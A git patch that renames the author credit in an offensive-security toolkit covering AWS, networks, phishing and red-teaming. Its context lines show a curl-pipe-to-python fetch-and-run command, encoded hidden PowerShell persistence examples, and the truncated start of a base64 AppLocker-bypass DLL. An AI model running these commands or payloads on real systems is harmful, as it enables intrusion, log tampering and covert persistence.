From 558762a498f9cf13b2d59ca01970bfb243978063 Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Sun, 24 Oct 2021 23:11:42 +0200 Subject: [PATCH] updates --- README.md | 2 +- clouds/aws/README.md | 8 ++++---- clouds/aws/assume-role-helper.sh | 2 +- clouds/aws/disruptCloudTrailByS3Lambda.py | 4 ++-- clouds/aws/evaluate-iam-role.sh | 2 +- clouds/aws/exfiltrate-ec2.py | 4 ++-- clouds/aws/exfiltrateLambdaTasksDirectory.py | 2 +- clouds/aws/identifyS3Bucket.rb | 4 ++-- clouds/aws/pentest-ec2-manager/aws-manager.rb | 2 +- file-formats/README.md | 2 +- file-formats/tamperUpx.py | 2 +- linux/openvas-automate.sh | 2 +- linux/prepare-kali.sh | 2 +- networks/CDPFlooder.py | 4 ++-- networks/HSRPFlooder.py | 4 ++-- networks/README.md | 10 +++++----- networks/RoutingAttackKit.py | 4 ++-- networks/VLANHopperDTP.py | 4 ++-- networks/dtpscan.py | 2 +- networks/exchangeRecon.py | 4 ++-- networks/host-scanner-via-udp.py | 2 +- networks/iis_webdav_upload.py | 2 +- networks/libssh-auth-bypass.py | 4 ++-- networks/networkConfigurationCredentialsExtract.py | 4 ++-- networks/smtpAudit.py | 8 ++++---- networks/smtpvrfy.py | 2 +- networks/wpa2-enterprise-utils/initDHCPServer.sh | 2 +- networks/wpa2-enterprise-utils/massDeauth.sh | 2 +- networks/wpa2-enterprise-utils/startEAPHammer.sh | 2 +- others/Contoso-AD-Structure/README.md | 2 +- others/bluetoothObexSpam.py | 4 ++-- others/correlateCrackedHashes.py | 2 +- others/encrypt.rb | 2 +- others/vm-manager.sh | 2 +- others/xor-key-recovery.py | 2 +- phishing/WMIPersistence.vbs | 2 +- phishing/decode-spam-headers.py | 2 +- phishing/gophish-send-mail/README.md | 2 +- phishing/gophish-send-mail/gophish-send-mail.py | 2 +- phishing/phishing-HTML-linter.py | 2 +- phishing/vba-windows-persistence.vbs | 2 +- .../Bypass-ConstrainedLanguageMode/Bypass-CLM.ps1 | 2 +- .../Bypass-ConstrainedLanguageMode/Bypass-CLM2.ps1 | 2 +- .../ClmDisableDll/main.cpp | 2 +- red-teaming/Bypass-ConstrainedLanguageMode/README.md | 2 +- red-teaming/C3-Client/README.md | 12 ++++++------ red-teaming/C3-Client/c3-client.py | 2 +- red-teaming/Count-PrivilegedGroupMembers.ps1 | 2 +- red-teaming/Disable-Amsi.ps1 | 2 +- red-teaming/Disable-ScriptLogging.ps1 | 2 +- red-teaming/Export-ReconData.ps1 | 2 +- red-teaming/Get-DomainOUTree.ps1 | 6 +++--- red-teaming/Get-UserPasswordEntries.ps1 | 2 +- red-teaming/README.md | 12 ++++++------ red-teaming/Save-ReconData.ps1 | 2 +- .../code-exec-templates/download-file-and-exec.vbs | 2 +- .../download-powershell-and-exec-via-stdin.vbs | 2 +- .../drop-binary-file-and-launch.vbs | 2 +- red-teaming/code-exec-templates/wmi-exec-command.vbs | 2 +- .../code-exec-templates/wscript-shell-code-exec.vbs | 2 +- .../wscript-shell-stdin-code-exec.vbs | 2 +- red-teaming/generateMSBuildXML.py | 6 +++--- red-teaming/markOwnedNodesInNeo4j.py | 2 +- red-teaming/msbuild-powershell-msgbox.xml | 2 +- red-teaming/rogue-dot-net/README.md | 4 ++-- red-teaming/rogue-dot-net/generateRogueDotNet.py | 6 +++--- web/blindxxe.py | 4 ++-- web/padding-oracle-tests.py | 4 ++-- web/post.php | 2 +- web/py-collaborator/README.md | 2 +- web/py-collaborator/py-collaborator-server.py | 2 +- web/reencode.py | 2 +- web/ysoserial-generator.py | 6 +++--- windows/GlobalProtectDisable.cpp | 2 +- windows/README.md | 4 ++-- windows/findSymbols.py | 4 ++-- windows/pth-carpet.py | 4 ++-- windows/rdpFileUpload.py | 4 ++-- 78 files changed, 124 insertions(+), 124 deletions(-) diff --git a/README.md b/README.md index d4706a0..0762cf7 100644 --- a/README.md +++ b/README.md @@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor --- ``` -Mariusz B. / mgeeky, (@mariuszbit) +Mariusz Banach / mgeeky, (@mariuszbit) ``` \ No newline at end of file diff --git a/clouds/aws/README.md b/clouds/aws/README.md index 30c3d7c..5e819ff 100644 --- a/clouds/aws/README.md +++ b/clouds/aws/README.md @@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help :: AWS CloudTrail disruption via S3 Put notification to Lambda Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, usage: disruptCloudTrailByS3Lambda.py [options] [trail_name] @@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX :: AWS CloudTrail disruption via S3 Put notification to Lambda Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, [.] Will be working on Account ID: 712800000000 [.] Step 1: Determine trail to disrupt @@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help :: exfiltrate-ec2 Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE] [--access-key ACCESS_KEY] [--secret-key SECRET_KEY] @@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default - :: exfiltrate-ec2 Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, [.] Using attacker's profile: default [.] Using victim's profile: victim-profile diff --git a/clouds/aws/assume-role-helper.sh b/clouds/aws/assume-role-helper.sh index b4984e1..64a72f3 100644 --- a/clouds/aws/assume-role-helper.sh +++ b/clouds/aws/assume-role-helper.sh @@ -3,7 +3,7 @@ # This script simply calls `aws sts assume-role` using hardcoded parameters, in order # to retrieve set of session credentials and reformat it into ~/.aws/credentials file format. # -# Mariusz B., mgeeky '19-20 +# Mariusz Banach, mgeeky '19-20 # diff --git a/clouds/aws/disruptCloudTrailByS3Lambda.py b/clouds/aws/disruptCloudTrailByS3Lambda.py index 85b62e4..053e2cf 100755 --- a/clouds/aws/disruptCloudTrailByS3Lambda.py +++ b/clouds/aws/disruptCloudTrailByS3Lambda.py @@ -38,7 +38,7 @@ # - boto3 # - pytest # -# Author: Mariusz B. / mgeeky '19, +# Author: Mariusz Banach / mgeeky '19, # @@ -427,7 +427,7 @@ def parseOptions(argv): print(''' :: AWS CloudTrail disruption via S3 Put notification to Lambda Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, ''') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] [trail_name]') diff --git a/clouds/aws/evaluate-iam-role.sh b/clouds/aws/evaluate-iam-role.sh index b2c28ad..9469926 100755 --- a/clouds/aws/evaluate-iam-role.sh +++ b/clouds/aws/evaluate-iam-role.sh @@ -5,7 +5,7 @@ # policy statements. Then goes through allowed permissions to pick all of them out. # Finally, checks every allowed permission against a list of known troublesome ones. # -# Mariusz B., mgeeky '19, +# Mariusz Banach, mgeeky '19, # v0.1 # diff --git a/clouds/aws/exfiltrate-ec2.py b/clouds/aws/exfiltrate-ec2.py index d9fa49a..723dd5c 100644 --- a/clouds/aws/exfiltrate-ec2.py +++ b/clouds/aws/exfiltrate-ec2.py @@ -33,7 +33,7 @@ # WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is # not recommended to use it during legal AWS Penetration Tests # -# Author: Mariusz B. / mgeeky, '19, +# Author: Mariusz Banach / mgeeky, '19, # import sys @@ -422,7 +422,7 @@ def parseOptions(argv): print(''' :: exfiltrate-ec2 Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, ''') parser = argparse.ArgumentParser(prog = argv[0]) diff --git a/clouds/aws/exfiltrateLambdaTasksDirectory.py b/clouds/aws/exfiltrateLambdaTasksDirectory.py index a128f71..a56ed7c 100755 --- a/clouds/aws/exfiltrateLambdaTasksDirectory.py +++ b/clouds/aws/exfiltrateLambdaTasksDirectory.py @@ -9,7 +9,7 @@ # # $ curl -s https:///exfiltrateLambdaTasksDirectory.py | python # -# Author: Mariusz B., '19, +# Author: Mariusz Banach, '19, # import zipfile, StringIO diff --git a/clouds/aws/identifyS3Bucket.rb b/clouds/aws/identifyS3Bucket.rb index 5041167..9b5f16b 100755 --- a/clouds/aws/identifyS3Bucket.rb +++ b/clouds/aws/identifyS3Bucket.rb @@ -3,7 +3,7 @@ # This script leverages couple of methods in order to validate that passed # domain is a S3 bucket indeed. # -# Mariusz B., 2019, +# Mariusz Banach, 2019, # require 'resolv' @@ -245,7 +245,7 @@ def main(args) puts %{ :: Identifies AWS S3 Buckets via couple of methods - Mariusz B. 19', + Mariusz Banach 19', } if ARGV.length != 1 diff --git a/clouds/aws/pentest-ec2-manager/aws-manager.rb b/clouds/aws/pentest-ec2-manager/aws-manager.rb index 88decc8..b359b38 100755 --- a/clouds/aws/pentest-ec2-manager/aws-manager.rb +++ b/clouds/aws/pentest-ec2-manager/aws-manager.rb @@ -20,7 +20,7 @@ # Requirements: # - gem "aws-sdk-ec2" # -# Author: Mariusz B., '19, +# Author: Mariusz Banach, '19, # require 'aws-sdk-ec2' diff --git a/file-formats/README.md b/file-formats/README.md index 25461bf..3f65917 100644 --- a/file-formats/README.md +++ b/file-formats/README.md @@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe :: tamperUpx - a small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored. - Mariusz B. / mgeeky, '21 + Mariusz Banach / mgeeky, '21 Step 1. Renaming UPX sections... Renamed UPX section (UPX0 ) => (.text) diff --git a/file-formats/tamperUpx.py b/file-formats/tamperUpx.py index 71edc30..01b7542 100644 --- a/file-formats/tamperUpx.py +++ b/file-formats/tamperUpx.py @@ -119,7 +119,7 @@ def main(argv): :: tamperUpx - a small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored. - Mariusz B. / mgeeky, '21 + Mariusz Banach / mgeeky, '21 ''') if len(argv) < 2: diff --git a/linux/openvas-automate.sh b/linux/openvas-automate.sh index e4624e2..060327a 100644 --- a/linux/openvas-automate.sh +++ b/linux/openvas-automate.sh @@ -1,7 +1,7 @@ #!/bin/bash # # OpenVAS automation script. -# Mariusz B. / mgeeky, '17 +# Mariusz Banach / mgeeky, '17 # v0.2 # diff --git a/linux/prepare-kali.sh b/linux/prepare-kali.sh index 66d75dd..5c54e1b 100644 --- a/linux/prepare-kali.sh +++ b/linux/prepare-kali.sh @@ -13,7 +13,7 @@ # keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script # - only tools that I've found useful at least once are landing in this script. # -# Mariusz B., '18-'19 +# Mariusz Banach, '18-'19 # # Well, entire Kali installation assume that we are normally working as root on our Kali. diff --git a/networks/CDPFlooder.py b/networks/CDPFlooder.py index 6685ddd..e7ce115 100755 --- a/networks/CDPFlooder.py +++ b/networks/CDPFlooder.py @@ -8,7 +8,7 @@ # Python requirements: # - scapy # -# Mariusz B. / mgeeky, '18, +# Mariusz Banach / mgeeky, '18, # import sys @@ -202,7 +202,7 @@ def parseOptions(argv): print(''' :: CDP Flooding / Denial of Service tool Floods the interface with fake, randomly generated CDP packets. - Mariusz B. / mgeeky '18, + Mariusz Banach / mgeeky '18, v{} '''.format(VERSION)) diff --git a/networks/HSRPFlooder.py b/networks/HSRPFlooder.py index 3428168..5e3cc89 100755 --- a/networks/HSRPFlooder.py +++ b/networks/HSRPFlooder.py @@ -6,7 +6,7 @@ # Python requirements: # - scapy # -# Mariusz B. / mgeeky, '18, +# Mariusz Banach / mgeeky, '18, # import sys @@ -122,7 +122,7 @@ def parseOptions(argv): print(''' :: HSRP Flooding / Denial of Service tool Floods the interface with Active router Coup HSRP packets. - Mariusz B. / mgeeky '18, + Mariusz Banach / mgeeky '18, v{} '''.format(VERSION)) diff --git a/networks/README.md b/networks/README.md index ffd2f9b..efd85e1 100644 --- a/networks/README.md +++ b/networks/README.md @@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9 :: Exchange Fingerprinter Tries to obtain internal IP address, Domain name and other clues by talking to Exchange - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, v0.2 [.] Probing for Exchange fingerprints... @@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py :: Routing Protocols Exploitation toolkit Sends out various routing protocols management frames - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, v0.1 Available attacks: @@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v :: Routing Protocols Exploitation toolkit Sends out various routing protocols management frames - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, v0.1 [.] Using 192.168.1.14 as local/spoof IP address @@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help :: VLAN Hopping via DTP Trunk negotiation Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique - Mariusz B. / mgeeky, '18 + Mariusz Banach / mgeeky, '18 v0.3 usage: ./VLANHopperDTP.py [options] @@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1 :: VLAN Hopping via DTP Trunk negotiation Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique - Mariusz B. / mgeeky, '18 + Mariusz Banach / mgeeky, '18 v0.2 [+] VLAN Hopping IS possible. diff --git a/networks/RoutingAttackKit.py b/networks/RoutingAttackKit.py index 1a4fb41..aa9d2d4 100755 --- a/networks/RoutingAttackKit.py +++ b/networks/RoutingAttackKit.py @@ -13,7 +13,7 @@ # Python requirements: # - scapy # -# Mariusz B. / mgeeky, '19, +# Mariusz Banach / mgeeky, '19, # import sys @@ -618,7 +618,7 @@ def parseOptions(argv): print(''' :: Routing Protocols Exploitation toolkit Sends out various routing protocols management frames - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, v{} '''.format(VERSION)) diff --git a/networks/VLANHopperDTP.py b/networks/VLANHopperDTP.py index 0507a80..e8d1715 100755 --- a/networks/VLANHopperDTP.py +++ b/networks/VLANHopperDTP.py @@ -39,7 +39,7 @@ # - Add auto-packets capture functionality via tshark/tcpdump to specified out directory # - Add functionality to auto-scan via arp-scan desired network # -# Mariusz B. / mgeeky, '18-19, +# Mariusz Banach / mgeeky, '18-19, # import os @@ -724,7 +724,7 @@ def parseOptions(argv): print(''' :: VLAN Hopping via DTP Trunk negotiation Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique - Mariusz B. / mgeeky '18-19, + Mariusz Banach / mgeeky '18-19, v{} '''.format(VERSION)) diff --git a/networks/dtpscan.py b/networks/dtpscan.py index 8ff86d9..8186629 100644 --- a/networks/dtpscan.py +++ b/networks/dtpscan.py @@ -5,7 +5,7 @@ # the switch's port. This reconessaince will be helpful for performing # VLAN Hopping attacks. # -# Mariusz B. / mgeeky, '18 +# Mariusz Banach / mgeeky, '18 # import os diff --git a/networks/exchangeRecon.py b/networks/exchangeRecon.py index a288753..4738313 100644 --- a/networks/exchangeRecon.py +++ b/networks/exchangeRecon.py @@ -32,7 +32,7 @@ # - packaging # # Author: -# Mariusz B. / mgeeky, '19, +# Mariusz Banach / mgeeky, '19, # import re @@ -1300,7 +1300,7 @@ def parseOptions(argv): print(''' :: Exchange Fingerprinter Tries to obtain internal IP address, Domain name and other clues by talking to Exchange - Mariusz B. / mgeeky '19, + Mariusz Banach / mgeeky '19, v{} '''.format(VERSION)) diff --git a/networks/host-scanner-via-udp.py b/networks/host-scanner-via-udp.py index 4e45b7b..f6e3698 100755 --- a/networks/host-scanner-via-udp.py +++ b/networks/host-scanner-via-udp.py @@ -6,7 +6,7 @@ # # Based on "Black Hat Python" book by Justin Seitz. # -# Mariusz B. +# Mariusz Banach # import os diff --git a/networks/iis_webdav_upload.py b/networks/iis_webdav_upload.py index a705c84..fc10953 100644 --- a/networks/iis_webdav_upload.py +++ b/networks/iis_webdav_upload.py @@ -51,7 +51,7 @@ if __name__ == '__main__': print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit' print '\t(based on Metasploit HDM\'s implementation)' - print '\tMariusz B. / mgeeky, 2016\n' + print '\tMariusz Banach / mgeeky, 2016\n' host = sys.argv[1] if not host.startswith('http'): diff --git a/networks/libssh-auth-bypass.py b/networks/libssh-auth-bypass.py index 61fe499..2a4ad12 100644 --- a/networks/libssh-auth-bypass.py +++ b/networks/libssh-auth-bypass.py @@ -25,7 +25,7 @@ # Requirements: # - paramiko # -# Mariusz B. / mgeeky, +# Mariusz Banach / mgeeky, # import sys @@ -360,7 +360,7 @@ def main(): sys.stderr.write(''' :: CVE-2018-10993 libSSH authentication bypass exploit. Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication. - Mariusz B. / mgeeky '18, + Mariusz Banach / mgeeky '18, v{} '''.format(VERSION)) diff --git a/networks/networkConfigurationCredentialsExtract.py b/networks/networkConfigurationCredentialsExtract.py index ff52452..7cf70f0 100644 --- a/networks/networkConfigurationCredentialsExtract.py +++ b/networks/networkConfigurationCredentialsExtract.py @@ -5,7 +5,7 @@ # configuration files in order to extract plain and cipher passwords out of them. # Equipped with functionality to decrypt Cisco Type 7 passwords. # -# Mariusz B., mgeeky '18-20 +# Mariusz Banach, mgeeky '18-20 # import re @@ -427,7 +427,7 @@ def printResults(): def main(argv): Logger._out(''' :: Network-configuration Credentials extraction script - Mariusz B. / mgeeky, '18 + Mariusz Banach / mgeeky, '18 ''') opts = parseOptions(argv) if not opts: diff --git a/networks/smtpAudit.py b/networks/smtpAudit.py index 35265bf..d37d21f 100644 --- a/networks/smtpAudit.py +++ b/networks/smtpAudit.py @@ -72,7 +72,7 @@ # - Microsoft Exchange Server 2013 # # Author: -# Mariusz B. / mgeeky, '17-19, +# Mariusz Banach / mgeeky, '17-19, # # @@ -2958,7 +2958,7 @@ Date: {dateNow} smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool, (https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa) -by Mariusz B. / mgeeky () +by Mariusz Banach / mgeeky () . ''' @@ -3698,7 +3698,7 @@ class ParseOptions: def banner(): sys.stderr.write(''' :: SMTP Black-Box Audit tool. - v{}, Mariusz B. / mgeeky, '17 + v{}, Mariusz Banach / mgeeky, '17 '''.format(VERSION)) @@ -3828,7 +3828,7 @@ def main(argv): sys.stderr.write(''' :: SMTP configuration Audit / Penetration-testing tool Intended to be used as a black-box tool revealing security state of SMTP. - Mariusz B. / mgeeky, '17-19 + Mariusz Banach / mgeeky, '17-19 v{} '''.format(VERSION)) diff --git a/networks/smtpvrfy.py b/networks/smtpvrfy.py index 325c552..a41e512 100644 --- a/networks/smtpvrfy.py +++ b/networks/smtpvrfy.py @@ -3,7 +3,7 @@ # Simple script intended to abuse SMTP server's VRFY command to leak # usernames having accounts registered within it. # -# Mariusz B., 2016 +# Mariusz Banach, 2016 # import socket diff --git a/networks/wpa2-enterprise-utils/initDHCPServer.sh b/networks/wpa2-enterprise-utils/initDHCPServer.sh index 9f266ac..1a2a2ee 100755 --- a/networks/wpa2-enterprise-utils/initDHCPServer.sh +++ b/networks/wpa2-enterprise-utils/initDHCPServer.sh @@ -7,7 +7,7 @@ # Nothing fancy, just set of needed commands. Especially handy when # used with `startEAPHammer.sh` script. # -# Mariusz B. / mgeeky '18, +# Mariusz Banach / mgeeky '18, # if [ $# -ne 2 ]; then diff --git a/networks/wpa2-enterprise-utils/massDeauth.sh b/networks/wpa2-enterprise-utils/massDeauth.sh index dd11501..f7cc466 100755 --- a/networks/wpa2-enterprise-utils/massDeauth.sh +++ b/networks/wpa2-enterprise-utils/massDeauth.sh @@ -5,7 +5,7 @@ # that takes as input list of APs against which should deauth be launched, # and then attempts that attack. # -# Mariusz B. / mgeeky '18, +# Mariusz Banach / mgeeky '18, # if [ $# -ne 1 ]; then diff --git a/networks/wpa2-enterprise-utils/startEAPHammer.sh b/networks/wpa2-enterprise-utils/startEAPHammer.sh index 8eaa7b1..3795ec8 100755 --- a/networks/wpa2-enterprise-utils/startEAPHammer.sh +++ b/networks/wpa2-enterprise-utils/startEAPHammer.sh @@ -14,7 +14,7 @@ # Especially handy when used with companion script called: # `initDHCPServer.sh` # -# Mariusz B. / mgeeky '18, +# Mariusz Banach / mgeeky '18, # #################################################################### diff --git a/others/Contoso-AD-Structure/README.md b/others/Contoso-AD-Structure/README.md index 82d23f5..fc60d4a 100644 --- a/others/Contoso-AD-Structure/README.md +++ b/others/Contoso-AD-Structure/README.md @@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti ***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes*** -***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky*** +***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky*** **To Use:** Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt. diff --git a/others/bluetoothObexSpam.py b/others/bluetoothObexSpam.py index b5bff21..92c0654 100644 --- a/others/bluetoothObexSpam.py +++ b/others/bluetoothObexSpam.py @@ -3,7 +3,7 @@ # with incoming OBEX Object Push requests containing # specified file. # -# Mariusz B. / MGeeky, 16' +# Mariusz Banach / MGeeky, 16' # # Partially based on `Violent Python` snippets. # Modules required: @@ -79,7 +79,7 @@ def main(): parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly') print '\nBluetooth file carpet bombing via OBEX Object Push' - print 'Mariusz B. / MGeeky 16\n' + print 'Mariusz Banach / MGeeky 16\n' (opts, args) = parser.parse_args() diff --git a/others/correlateCrackedHashes.py b/others/correlateCrackedHashes.py index 05ecbca..0e63b2c 100755 --- a/others/correlateCrackedHashes.py +++ b/others/correlateCrackedHashes.py @@ -14,7 +14,7 @@ # WILL RETURN: # some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123 # -# Mariusz B. / mgeeky +# Mariusz Banach / mgeeky # import sys, os diff --git a/others/encrypt.rb b/others/encrypt.rb index e8827cf..006ea6d 100644 --- a/others/encrypt.rb +++ b/others/encrypt.rb @@ -4,7 +4,7 @@ # In latter case producing encrypted ZIP package that will get decompressed automatically # after decryption. # -# Mariusz B., 2016 v0.1 +# Mariusz Banach, 2016 v0.1 # require 'optparse' diff --git a/others/vm-manager.sh b/others/vm-manager.sh index 97183fe..7453246 100755 --- a/others/vm-manager.sh +++ b/others/vm-manager.sh @@ -11,7 +11,7 @@ # - scanning for other VMs # - setting selected VM's IP address within /etc/hosts (and alike) file # -# Mariusz B. / mgeeky, '16-'19 +# Mariusz Banach / mgeeky, '16-'19 # v0.7 # diff --git a/others/xor-key-recovery.py b/others/xor-key-recovery.py index 7d5ee91..662bd74 100644 --- a/others/xor-key-recovery.py +++ b/others/xor-key-recovery.py @@ -3,7 +3,7 @@ # Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length # it searches for proper key that could decrypt cipher into text. # -# Mariusz B., 2016 +# Mariusz Banach, 2016 # import sys diff --git a/phishing/WMIPersistence.vbs b/phishing/WMIPersistence.vbs index cc57c13..53c0300 100644 --- a/phishing/WMIPersistence.vbs +++ b/phishing/WMIPersistence.vbs @@ -15,7 +15,7 @@ ' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater") ' ' AUTHOR: -' Mariusz B. / mgeeky, '17 +' Mariusz Banach / mgeeky, '17 ' Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean diff --git a/phishing/decode-spam-headers.py b/phishing/decode-spam-headers.py index a914345..43c2f53 100644 --- a/phishing/decode-spam-headers.py +++ b/phishing/decode-spam-headers.py @@ -45,7 +45,7 @@ # - packaging # - dnspython # -# Mariusz B. / mgeeky, '21 +# Mariusz Banach / mgeeky, '21 # # diff --git a/phishing/gophish-send-mail/README.md b/phishing/gophish-send-mail/README.md index 0ce3da7..a078957 100644 --- a/phishing/gophish-send-mail/README.md +++ b/phishing/gophish-send-mail/README.md @@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml :: GoPhish Single Mail Send utility Helping you embellish your emails by sending them one-by-one - Mariusz B. / mgeeky + Mariusz Banach / mgeeky [+] Template to use: ID: 22 diff --git a/phishing/gophish-send-mail/gophish-send-mail.py b/phishing/gophish-send-mail/gophish-send-mail.py index 3f5bf56..c278753 100644 --- a/phishing/gophish-send-mail/gophish-send-mail.py +++ b/phishing/gophish-send-mail/gophish-send-mail.py @@ -165,7 +165,7 @@ def main(argv): print(''' :: GoPhish Single Mail Send utility Helping you embellish your emails by sending them one-by-one - Mariusz B. / mgeeky + Mariusz Banach / mgeeky ''') template = getTemplate() diff --git a/phishing/phishing-HTML-linter.py b/phishing/phishing-HTML-linter.py index 0f67971..14795f4 100644 --- a/phishing/phishing-HTML-linter.py +++ b/phishing/phishing-HTML-linter.py @@ -205,7 +205,7 @@ def main(argv): print(''' :: Phishing HTML Linter Shows you bad smells in your HTML code that will get your mails busted! - Mariusz B. / mgeeky + Mariusz Banach / mgeeky ''') html = '' diff --git a/phishing/vba-windows-persistence.vbs b/phishing/vba-windows-persistence.vbs index 4feeb77..05e5488 100644 --- a/phishing/vba-windows-persistence.vbs +++ b/phishing/vba-windows-persistence.vbs @@ -19,7 +19,7 @@ ' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater" ' ' AUTHOR: -' Mariusz B. / mgeeky, '17 +' Mariusz Banach / mgeeky, '17 ' Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM.ps1 b/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM.ps1 index 5594ed5..d696e70 100644 --- a/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM.ps1 +++ b/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM.ps1 @@ -100,7 +100,7 @@ function Bypass-CLM Write-Host "`tAppLocker Constrined Language Mode Bypass via COM" Write-Host "`t(implementation of: @xpn's technique, as documented in:)" Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)" - Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky" + Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky" Write-Host "`t-----`n" Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath" diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM2.ps1 b/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM2.ps1 index aa6a213..ba4dfa9 100644 --- a/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM2.ps1 +++ b/red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM2.ps1 @@ -129,7 +129,7 @@ function Bypass-CLM Write-Host "`tAppLocker Constrined Language Mode Bypass via COM" Write-Host "`t(implementation of: @xpn's technique, as documented in:)" Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)" - Write-Host "`n`tRe-implemented by: Mariusz B., mgeeky" + Write-Host "`n`tRe-implemented by: Mariusz Banach, mgeeky" Write-Host "`t-----`n" $EncodedAssemblyDll = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKxM2ZIAAAAAAAAAAOAAIiALATAAAA4AAAAGAAAAAAAAEi0AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAL0sAABPAAAAAEAAAMgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAYLAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAGA0AAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAMgDAAAAQAAAAAQAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADxLAAAAAAAAEgAAAACAAUAwCEAAFgKAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBAAnAQAAAQAAEXIBAABwKA8AAApyZwAAcCgQAAAKbxEAAAoKEgAoEgAACnK5AABwKAEAAAYKEgAoEgAACigTAAAKKA8AAAoCbxQAAAoWMRVywQAAcAJy6QAAcCgVAAAKKA8AAAooFgAACm8XAAAKFm8YAAAKKBYAAApvGQAAChZvGgAACt4TC3LtAABwBygbAAAKKA8AAAreAAAoHAAACiUWbx0AAAolGW8eAAAKJW8fAAAKJW8XAAAKFm8YAAAKbyAAAAreEwxyHwEAcAgoGw